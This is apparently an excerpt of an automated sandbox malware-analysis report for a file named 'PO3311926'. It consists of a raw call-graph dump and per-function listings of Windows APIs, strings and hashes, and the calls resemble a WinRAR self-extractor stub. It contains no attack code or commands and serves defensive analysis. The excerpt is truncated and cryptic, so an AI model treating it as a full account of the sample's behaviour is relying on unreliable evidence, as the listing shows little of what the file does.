25093->25098 25095 bab521 25099 bab61e 25095->25099 25098->25095 25100 bab630 _abort 25099->25100 25103 bb10dc 25100->25103 25106 bb109e GetCurrentProcess GetProcessAffinityMask 25103->25106 25107 bab597 25106->25107 25107->24951 25113 ba1732 25108->25113 25110 ba13d6 25110->24970 25111->24967 25112->24964 25114 ba1748 25113->25114 25125 ba17a0 __InternalCxxFrameHandler 25113->25125 25115 ba1771 25114->25115 25126 ba6c36 76 API calls __vswprintf_c_l 25114->25126 25116 ba17c7 25115->25116 25122 ba178d ___std_exception_copy 25115->25122 25118 bc3e3e 22 API calls 25116->25118 25121 ba17ce 25118->25121 25119 ba1767 25127 ba6ca7 75 API calls 25119->25127 25121->25125 25129 ba6ca7 75 API calls 25121->25129 25122->25125 25128 ba6ca7 75 API calls 25122->25128 25125->25110 25126->25119 25127->25115 25128->25125 25129->25125 25131 bacf4d 25130->25131 25133 bacf54 25130->25133 25132 ba981a 79 API calls 25131->25132 25132->25133 25133->24973 25134->24975 25136 bbde78 25135->25136 25137 bae617 53 API calls 25136->25137 25138 bbde9b 25137->25138 25139 ba4092 _swprintf 51 API calls 25138->25139 25140 bbdead 25139->25140 25141 bbd4d4 16 API calls 25140->25141 25142 bb1b7c 25141->25142 25142->24928 25144 ba19bf 25143->25144 25147 ba19bb 25143->25147 25148 ba9e80 79 API calls 25144->25148 25145 ba19d4 25149 ba18f6 25145->25149 25147->24982 25148->25145 25150 ba1908 25149->25150 25151 ba1945 25149->25151 25152 ba3b2d 102 API calls 25150->25152 25157 ba3fa3 25151->25157 25153 ba1928 25152->25153 25153->25147 25161 ba3fac 25157->25161 25158 ba3b2d 102 API calls 25158->25161 25159 ba1966 25159->25153 25162 ba1e50 25159->25162 25161->25158 25161->25159 25174 bb0e08 25161->25174 25163 ba1e5a __EH_prolog 25162->25163 25182 ba3bba 25163->25182 25165 ba1e84 25166 ba1732 78 API calls 25165->25166 25167 ba1f0b 25165->25167 25168 ba1e9b 25166->25168 25167->25153 25210 ba18a9 78 API calls 25168->25210 25170 ba1eb3 25171 ba1ebf _wcslen 25170->25171 25211 bb1b84 MultiByteToWideChar 25170->25211 25212 ba18a9 78 API calls 25171->25212 25176 bb0e0f 25174->25176 25175 bb0e2a 25178 bb0e3b SetThreadExecutionState 25175->25178 25181 ba6c31 RaiseException _com_raise_error 25175->25181 25176->25175 25180 ba6c31 RaiseException _com_raise_error 25176->25180 25178->25161 25180->25175 25181->25178 25183 ba3bc4 __EH_prolog 25182->25183 25184 ba3bda 25183->25184 25185 ba3bf6 25183->25185 25238 ba138b 74 API calls 25184->25238 25187 ba3e51 25185->25187 25190 ba3c22 25185->25190 25263 ba138b 74 API calls 25187->25263 25189 ba3be5 25189->25165 25190->25189 25213 bb3377 25190->25213 25192 ba3ca3 25194 ba3d2e 25192->25194 25209 ba3c9a 25192->25209 25241 bad051 25192->25241 25193 ba3c9f 25193->25192 25240 ba20bd 78 API calls 25193->25240 25223 baab1a 25194->25223 25196 ba3c8f 25239 ba138b 74 API calls 25196->25239 25197 ba3c71 25197->25192 25197->25193 25197->25196 25198 ba3d41 25203 ba3dd7 25198->25203 25204 ba3dc7 25198->25204 25247 bb3020 25203->25247 25227 ba9215 25204->25227 25207 ba3dd5 25207->25209 25256 ba2021 74 API calls 25207->25256 25257 bb2297 25209->25257 25210->25170 25211->25171 25212->25167 25214 bb338c 25213->25214 25216 bb3396 ___std_exception_copy 25213->25216 25264 ba6ca7 75 API calls 25214->25264 25217 bb341c 25216->25217 25218 bb34c6 25216->25218 25219 bb3440 _abort 25216->25219 25265 bb32aa 75 API calls 3 library calls 25217->25265 25266 bc238d RaiseException 25218->25266 25219->25197 25222 bb34f2 25224 baab28 25223->25224 25226 baab32 25223->25226 25225 bbeb38 8 API calls 25224->25225 25225->25226 25226->25198 25228 ba921f __EH_prolog 25227->25228 25267 ba7c64 25228->25267 25231 ba13ba 78 API calls 25232 ba9231 25231->25232 25270 bad114 25232->25270 25234 ba928a 25234->25207 25236 bad114 119 API calls 25237 ba9243 25236->25237 25237->25234 25237->25236 25279 bad300 97 API calls __InternalCxxFrameHandler 25237->25279 25238->25189 25239->25209 25240->25192 25242 bad072 25241->25242 25243 bad084 25241->25243 25280 ba603a 82 API calls 25242->25280 25281 ba603a 82 API calls 25243->25281 25246 bad07c 25246->25194 25248 bb3029 25247->25248 25249 bb3052 25247->25249 25250 bb3048 25248->25250 25252 bb303e 25248->25252 25255 bb3046 25248->25255 25249->25255 25296 bb552f 124 API calls 2 library calls 25249->25296 25295 bb624a 119 API calls 25250->25295 25282 bb6cdc 25252->25282 25255->25207 25256->25209 25258 bb22a1 25257->25258 25259 bb22ba 25258->25259 25262 bb22ce 25258->25262 25297 bb0eed 86 API calls 25259->25297 25261 bb22c1 25261->25262 25263->25189 25264->25216 25265->25219 25266->25222 25268 bab146 GetVersionExW 25267->25268 25269 ba7c69 25268->25269 25269->25231 25276 bad12a __InternalCxxFrameHandler 25270->25276 25271 bad29a 25272 bad2ce 25271->25272 25273 bad0cb 6 API calls 25271->25273 25274 bb0e08 SetThreadExecutionState RaiseException 25272->25274 25273->25272 25277 bad291 25274->25277 25275 bb8c8d 104 API calls 25275->25276 25276->25271 25276->25275 25276->25277 25278 baac05 91 API calls 25276->25278 25277->25237 25278->25276 25279->25237 25280->25246 25281->25246 25283 bb359e 75 API calls 25282->25283 25284 bb6ced __InternalCxxFrameHandler 25283->25284 25285 bad114 119 API calls 25284->25285 25286 bb70fe 25284->25286 25289 bb11cf 81 API calls 25284->25289 25290 bb3e0b 119 API calls 25284->25290 25291 bb7153 119 API calls 25284->25291 25292 bb0f86 88 API calls 25284->25292 25293 bb390d 98 API calls 25284->25293 25294 bb77ef 124 API calls 25284->25294 25285->25284 25287 bb5202 98 API calls 25286->25287 25288 bb710e __InternalCxxFrameHandler 25287->25288 25288->25255 25289->25284 25290->25284 25291->25284 25292->25284 25293->25284 25294->25284 25295->25255 25296->25255 25297->25261 25298->24992 25299->24992 25300->24989 25302 ba5d2a 25301->25302 25347 ba5c4b 25302->25347 25304 ba5d5d 25306 ba5d95 25304->25306 25352 bab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25304->25352 25306->25007 25308 ba8186 25307->25308 25309 ba8232 25308->25309 25359 babe5e 19 API calls __InternalCxxFrameHandler 25308->25359 25358 bb1fac CharUpperW 25309->25358 25312 ba823b 25312->25010 25314 ba7c22 25313->25314 25315 ba7c5a 25314->25315 25360 ba6e7a 74 API calls 25314->25360 25315->25020 25317 ba7c52 25361 ba138b 74 API calls 25317->25361 25319->25072 25321 ba9db3 25320->25321 25324 ba9dc2 25320->25324 25322 ba9db9 FlushFileBuffers 25321->25322 25321->25324 25322->25324 25323 ba9e3f SetFileTime 25323->25078 25324->25323 25325->24999 25326->25006 25327->25006 25328->25020 25329->25020 25330->25017 25331->25028 25332->25024 25333->25028 25335 ba8b5a 25334->25335 25336 ba98c5 GetFileType 25334->25336 25335->25042 25337 ba2021 74 API calls 25335->25337 25336->25335 25337->25040 25338->25042 25339->25043 25340->25068 25341->25068 25342->25068 25343->25068 25344->25075 25345->25081 25346->25071 25353 ba5b48 25347->25353 25350 ba5b48 2 API calls 25351 ba5c6c 25350->25351 25351->25304 25352->25304 25354 ba5b52 25353->25354 25356 ba5c3a 25354->25356 25357 bab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25354->25357 25356->25350 25356->25351 25357->25354 25358->25312 25359->25309 25360->25317 25361->25315 25363->25089 25365 baa6a8 25364->25365 25366 baa6c1 FindFirstFileW 25365->25366 25367 baa727 FindNextFileW 25365->25367 25368 baa6d0 25366->25368 25374 baa709 25366->25374 25369 baa732 GetLastError 25367->25369 25367->25374 25370 babb03 GetCurrentDirectoryW 25368->25370 25369->25374 25371 baa6e0 25370->25371 25372 baa6fe GetLastError 25371->25372 25373 baa6e4 FindFirstFileW 25371->25373 25372->25374 25373->25372 25373->25374 25374->24941 25375->24775 25376->24781 25377->24781 25378->24784 25379->24790 25381 ba9f42 78 API calls 25380->25381 25382 ba1fe8 25381->25382 25383 ba2005 25382->25383 25384 ba1a04 102 API calls 25382->25384 25383->24798 25383->24799 25385 ba1ff5 25384->25385 25385->25383 25387 ba138b 74 API calls 25385->25387 25387->25383 25389 bbb5bc GetDlgItem 25388->25389 25390 bbb583 GetMessageW 25388->25390 25389->24809 25389->24810 25391 bbb599 IsDialogMessageW 25390->25391 25392 bbb5a8 TranslateMessage DispatchMessageW 25390->25392 25391->25389 25391->25392 25392->25389 25393 ba13e1 84 API calls 2 library calls 25513 bb94e0 GetClientRect 25514 bbf2e0 46 API calls __RTC_Initialize 25567 bb21e0 26 API calls std::bad_exception::bad_exception 25394 bbeae7 25395 bbeaf1 25394->25395 25396 bbe85d ___delayLoadHelper2@8 14 API calls 25395->25396 25397 bbeafe 25396->25397 25515 bbf4e7 29 API calls _abort 25516 bcbee0 GetCommandLineA GetCommandLineW 25517 bc0ada 51 API calls 2 library calls 25518 bbf4d3 20 API calls 25464 bbe1d1 14 API calls ___delayLoadHelper2@8 25466 bbe2d7 25467 bbe1db 25466->25467 25468 bbe85d ___delayLoadHelper2@8 14 API calls 25467->25468 25468->25467 25569 bca3d0 21 API calls 2 library calls 25570 bd2bd0 VariantClear 25471 ba10d5 25476 ba5abd 25471->25476 25477 ba5ac7 __EH_prolog 25476->25477 25478 bab505 84 API calls 25477->25478 25479 ba5ad3 25478->25479 25483 ba5cac GetCurrentProcess GetProcessAffinityMask 25479->25483 25521 bb62ca 124 API calls __InternalCxxFrameHandler 25489 bbdec2 25490 bbdecf 25489->25490 25491 bae617 53 API calls 25490->25491 25492 bbdedc 25491->25492 25493 ba4092 _swprintf 51 API calls 25492->25493 25494 bbdef1 SetDlgItemTextW 25493->25494 25495 bbb568 5 API calls 25494->25495 25496 bbdf0e 25495->25496 25572 bbb5c0 100 API calls 25573 bb77c0 119 API calls 25574 bbffc0 RaiseException _com_raise_error _com_error::_com_error 25576 bbf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25577 bbff30 LocalFree 24256 bcbb30 24257 bcbb39 24256->24257 24258 bcbb42 24256->24258 24260 bcba27 24257->24260 24261 bc97e5 _unexpected 38 API calls 24260->24261 24262 bcba34 24261->24262 24280 bcbb4e 24262->24280 24264 bcba3c 24289 bcb7bb 24264->24289 24267 bcba53 24267->24258 24270 bcba96 24272 bc8dcc _free 20 API calls 24270->24272 24272->24267 24274 bcba91 24313 bc91a8 20 API calls __dosmaperr 24274->24313 24276 bcbada 24276->24270 24314 bcb691 26 API calls 24276->24314 24277 bcbaae 24277->24276 24278 bc8dcc _free 20 API calls 24277->24278 24278->24276 24281 bcbb5a ___scrt_is_nonwritable_in_current_image 24280->24281 24282 bc97e5 _unexpected 38 API calls 24281->24282 24287 bcbb64 24282->24287 24284 bcbbe8 _abort 24284->24264 24287->24284 24288 bc8dcc _free 20 API calls 24287->24288 24315 bc8d24 38 API calls _abort 24287->24315 24316 bcac31 EnterCriticalSection 24287->24316 24317 bcbbdf LeaveCriticalSection _abort 24287->24317 24288->24287 24290 bc4636 __fassign 38 API calls 24289->24290 24291 bcb7cd 24290->24291 24292 bcb7dc GetOEMCP 24291->24292 24293 bcb7ee 24291->24293 24294 bcb805 24292->24294 24293->24294 24295 bcb7f3 GetACP 24293->24295 24294->24267 24296 bc8e06 24294->24296 24295->24294 24297 bc8e44 24296->24297 24301 bc8e14 _unexpected 24296->24301 24319 bc91a8 20 API calls __dosmaperr 24297->24319 24299 bc8e2f RtlAllocateHeap 24300 bc8e42 24299->24300 24299->24301 24300->24270 24303 bcbbf0 24300->24303 24301->24297 24301->24299 24318 bc7a5e 7 API calls 2 library calls 24301->24318 24304 bcb7bb 40 API calls 24303->24304 24305 bcbc0f 24304->24305 24308 bcbc60 IsValidCodePage 24305->24308 24310 bcbc16 24305->24310 24312 bcbc85 _abort 24305->24312 24306 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24307 bcba89 24306->24307 24307->24274 24307->24277 24309 bcbc72 GetCPInfo 24308->24309 24308->24310 24309->24310 24309->24312 24310->24306 24320 bcb893 GetCPInfo 24312->24320 24313->24270 24314->24270 24316->24287 24317->24287 24318->24301 24319->24300 24326 bcb8cd 24320->24326 24329 bcb977 24320->24329 24323 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24325 bcba23 24323->24325 24325->24310 24330 bcc988 24326->24330 24328 bcab78 __vswprintf_c_l 43 API calls 24328->24329 24329->24323 24331 bc4636 __fassign 38 API calls 24330->24331 24332 bcc9a8 MultiByteToWideChar 24331->24332 24334 bcc9e6 24332->24334 24342 bcca7e 24332->24342 24336 bc8e06 __vswprintf_c_l 21 API calls 24334->24336 24339 bcca07 _abort __vsnwprintf_l 24334->24339 24335 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24337 bcb92e 24335->24337 24336->24339 24344 bcab78 24337->24344 24338 bcca78 24349 bcabc3 20 API calls _free 24338->24349 24339->24338 24341 bcca4c MultiByteToWideChar 24339->24341 24341->24338 24343 bcca68 GetStringTypeW 24341->24343 24342->24335 24343->24338 24345 bc4636 __fassign 38 API calls 24344->24345 24346 bcab8b 24345->24346 24350 bca95b 24346->24350 24349->24342 24351 bca976 __vswprintf_c_l 24350->24351 24352 bca99c MultiByteToWideChar 24351->24352 24353 bca9c6 24352->24353 24354 bcab50 24352->24354 24357 bc8e06 __vswprintf_c_l 21 API calls 24353->24357 24359 bca9e7 __vsnwprintf_l 24353->24359 24355 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24354->24355 24356 bcab63 24355->24356 24356->24328 24357->24359 24358 bcaa30 MultiByteToWideChar 24360 bcaa49 24358->24360 24372 bcaa9c 24358->24372 24359->24358 24359->24372 24377 bcaf6c 24360->24377 24364 bcaaab 24368 bc8e06 __vswprintf_c_l 21 API calls 24364->24368 24373 bcaacc __vsnwprintf_l 24364->24373 24365 bcaa73 24367 bcaf6c __vswprintf_c_l 11 API calls 24365->24367 24365->24372 24366 bcab41 24385 bcabc3 20 API calls _free 24366->24385 24367->24372 24368->24373 24369 bcaf6c __vswprintf_c_l 11 API calls 24371 bcab20 24369->24371 24371->24366 24374 bcab2f WideCharToMultiByte 24371->24374 24386 bcabc3 20 API calls _free 24372->24386 24373->24366 24373->24369 24374->24366 24375 bcab6f 24374->24375 24387 bcabc3 20 API calls _free 24375->24387 24378 bcac98 _unexpected 5 API calls 24377->24378 24379 bcaf93 24378->24379 24382 bcaf9c 24379->24382 24388 bcaff4 10 API calls 3 library calls 24379->24388 24381 bcafdc LCMapStringW 24381->24382 24383 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24382->24383 24384 bcaa60 24383->24384 24384->24364 24384->24365 24384->24372 24385->24372 24386->24354 24387->24372 24388->24381 25524 bcc030 GetProcessHeap 25525 bbc220 93 API calls _swprintf 25527 bcf421 21 API calls __vswprintf_c_l 25528 ba1025 29 API calls 25580 ba1710 86 API calls 25581 bbad10 73 API calls 25531 bba400 GdipDisposeImage GdipFree 25532 bbd600 70 API calls 25533 bc6000 QueryPerformanceFrequency QueryPerformanceCounter 25535 bcf200 51 API calls 25584 bc2900 6 API calls 4 library calls 25586 bca700 21 API calls 24474 ba9f7a 24475 ba9f88 24474->24475 24476 ba9f8f 24474->24476 24477 ba9f9c GetStdHandle 24476->24477 24484 ba9fab 24476->24484 24477->24484 24478 baa003 WriteFile 24478->24484 24479 ba9fcf 24480 ba9fd4 WriteFile 24479->24480 24479->24484 24480->24479 24480->24484 24482 baa095 24486 ba6e98 77 API calls 24482->24486 24484->24475 24484->24478 24484->24479 24484->24480 24484->24482 24485 ba6baa 78 API calls 24484->24485 24485->24484 24486->24475 25588 ba1f72 129 API calls __EH_prolog 25537 bba070 10 API calls 25539 bbb270 99 API calls 24514 ba9a74 24518 ba9a7e 24514->24518 24515 ba9ab1 24516 ba9b9d SetFilePointer 24516->24515 24517 ba9bb6 GetLastError 24516->24517 24517->24515 24518->24515 24518->24516 24520 ba9b79 24518->24520 24521 ba981a 24518->24521 24520->24516 24522 ba9833 24521->24522 24524 ba9e80 79 API calls 24522->24524 24523 ba9865 24523->24520 24524->24523 25540 ba1075 84 API calls 25541 bbc793 108 API calls 4 library calls 25590 bc7f6e 52 API calls 3 library calls 25542 bc8268 55 API calls _free 25399 bbcd58 25401 bbce22 25399->25401 25404 bbcd7b 25399->25404 25415 bbc793 _wcslen _wcsrchr 25401->25415 25427 bbd78f 25401->25427 25403 bbd40a 25404->25401 25406 bb1fbb CompareStringW 25404->25406 25406->25404 25407 bbca67 SetWindowTextW 25407->25415 25410 bc3e3e 22 API calls 25410->25415 25412 bbc855 SetFileAttributesW 25414 bbc90f GetFileAttributesW 25412->25414 25425 bbc86f _abort _wcslen 25412->25425 25414->25415 25417 bbc921 DeleteFileW 25414->25417 25415->25403 25415->25407 25415->25410 25415->25412 25415->25425 25452 bb1fbb CompareStringW 25415->25452 25453 bba64d GetCurrentDirectoryW 25415->25453 25455 baa5d1 6 API calls 25415->25455 25456 baa55a FindClose 25415->25456 25457 bbb48e 76 API calls 2 library calls 25415->25457 25458 bbb314 ExpandEnvironmentStringsW 25415->25458 25417->25415 25419 bbc932 25417->25419 25418 bbcc31 GetDlgItem SetWindowTextW SendMessageW 25418->25425 25420 ba4092 _swprintf 51 API calls 25419->25420 25422 bbc952 GetFileAttributesW 25420->25422 25421 bbcc71 SendMessageW 25421->25415 25422->25419 25423 bbc967 MoveFileW 25422->25423 25423->25415 25424 bbc97f MoveFileExW 25423->25424 25424->25415 25425->25415 25425->25418 25425->25421 25426 bbc8eb SHFileOperationW 25425->25426 25454 bab991 51 API calls 2 library calls 25425->25454 25426->25414 25429 bbd799 _abort _wcslen 25427->25429 25428 bbd9e7 25428->25415 25429->25428 25430 bbd8a5 25429->25430 25431 bbd9c0 25429->25431 25459 bb1fbb CompareStringW 25429->25459 25433 baa231 3 API calls 25430->25433 25431->25428 25435 bbd9de ShowWindow 25431->25435 25434 bbd8ba 25433->25434 25436 bbd8d9 ShellExecuteExW 25434->25436 25460 bab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25434->25460 25435->25428 25436->25428 25437 bbd8ec 25436->25437 25440 bbd910 IsWindowVisible 25437->25440 25441 bbd925 WaitForInputIdle 25437->25441 25442 bbd97b CloseHandle 25437->25442 25439 bbd8d1 25439->25436 25440->25441 25443 bbd91b ShowWindow 25440->25443 25444 bbdc3b 6 API calls 25441->25444 25445 bbd989 25442->25445 25446 bbd994 25442->25446 25443->25441 25447 bbd93d 25444->25447 25461 bb1fbb CompareStringW 25445->25461 25446->25431 25447->25442 25449 bbd950 GetExitCodeProcess 25447->25449 25449->25442 25450 bbd963 25449->25450 25450->25442 25452->25415 25453->25415 25454->25425 25455->25415 25456->25415 25457->25415 25458->25415 25459->25430 25460->25439 25461->25446 25469 bcc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25544 bbe455 14 API calls ___delayLoadHelper2@8 25545 bba440 GdipCloneImage GdipAlloc 25546 bc3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25594 bd1f40 CloseHandle

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00BB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BB087C
                                                                                                • Part of subcall function 00BB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB088E
                                                                                                • Part of subcall function 00BB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB08BF
                                                                                                • Part of subcall function 00BBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BBA655
                                                                                                • Part of subcall function 00BBAC16: OleInitialize.OLE32(00000000), ref: 00BBAC2F
                                                                                                • Part of subcall function 00BBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBAC66
                                                                                                • Part of subcall function 00BBAC16: SHGetMalloc.SHELL32(00BE8438), ref: 00BBAC70
                                                                                              • GetCommandLineW.KERNEL32 ref: 00BBDF5C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BBDF83
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BBDF94
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00BBDFCE
                                                                                                • Part of subcall function 00BBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BBDBF4
                                                                                                • Part of subcall function 00BBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBDC30
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBDFD7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00BFEC90,00000800), ref: 00BBDFF2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00BFEC90), ref: 00BBDFFE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00BBE009
                                                                                              • _swprintf.LIBCMT ref: 00BBE048
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BBE05A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00BBE061
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00BBE078
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BBE0C9
                                                                                              • Sleep.KERNELBASE(?), ref: 00BBE0F7
                                                                                              • DeleteObject.GDI32 ref: 00BBE130
                                                                                              • DeleteObject.GDI32(?), ref: 00BBE140
                                                                                              • CloseHandle.KERNEL32 ref: 00BBE183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3049964643-856837684
                                                                                              • Opcode ID: 1114178fc7d18824345adc232bde01e7cc1e99d8b14d4b431f14cd5d83d2f786
                                                                                              • Instruction ID: 98c924437d1f4b3f23325d43ce9ff7338ec576233d15d43ca461a5b1813de56f
                                                                                              • Opcode Fuzzy Hash: 1114178fc7d18824345adc232bde01e7cc1e99d8b14d4b431f14cd5d83d2f786
                                                                                              • Instruction Fuzzy Hash: 9D61F671905245AFD320AB74DC99FBB7BECEB45700F0004AAF505A72A2EFB8D944C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 728 bba6c2-bba6df FindResourceW 729 bba7db 728->729 730 bba6e5-bba6f6 SizeofResource 728->730 731 bba7dd-bba7e1 729->731 730->729 732 bba6fc-bba70b LoadResource 730->732 732->729 733 bba711-bba71c LockResource 732->733 733->729 734 bba722-bba737 GlobalAlloc 733->734 735 bba73d-bba746 GlobalLock 734->735 736 bba7d3-bba7d9 734->736 737 bba7cc-bba7cd GlobalFree 735->737 738 bba74c-bba76a call bc0320 735->738 736->731 737->736 742 bba76c-bba78e call bba626 738->742 743 bba7c5-bba7c6 GlobalUnlock 738->743 742->743 748 bba790-bba798 742->748 743->737 749 bba79a-bba7ae GdipCreateHBITMAPFromBitmap 748->749 750 bba7b3-bba7c1 748->750 749->750 751 bba7b0 749->751 750->743 751->750
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA72D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA73E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00BBA7C6
                                                                                                • Part of subcall function 00BBA626: GdipAlloc.GDIPLUS(00000010), ref: 00BBA62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BBA7A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00BBA7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 541704414-364855578
                                                                                              • Opcode ID: 188d9c8f905ce972238fa677719a00166e3d3e29984b56496b0b8dd14ed8cdd8
                                                                                              • Instruction ID: b26b932785f69def941b4c9122d2c4b3f16069c975bb3288a65215f4ec9304fa
                                                                                              • Opcode Fuzzy Hash: 188d9c8f905ce972238fa677719a00166e3d3e29984b56496b0b8dd14ed8cdd8
                                                                                              • Instruction Fuzzy Hash: 3031C4B5A05702AFC7109F22DC98D6BBBF8EF84B50B000959F84593262FF71DC44CA62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1061 baa69b-baa6bf call bbec50 1064 baa6c1-baa6ce FindFirstFileW 1061->1064 1065 baa727-baa730 FindNextFileW 1061->1065 1066 baa742-baa7ff call bb0602 call bac310 call bb15da * 3 1064->1066 1067 baa6d0-baa6e2 call babb03 1064->1067 1065->1066 1068 baa732-baa740 GetLastError 1065->1068 1074 baa804-baa811 1066->1074 1076 baa6fe-baa707 GetLastError 1067->1076 1077 baa6e4-baa6fc FindFirstFileW 1067->1077 1070 baa719-baa722 1068->1070 1070->1074 1079 baa709-baa70c 1076->1079 1080 baa717 1076->1080 1077->1066 1077->1076 1079->1080 1082 baa70e-baa711 1079->1082 1080->1070 1082->1080 1084 baa713-baa715 1082->1084 1084->1070
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6C4
                                                                                                • Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
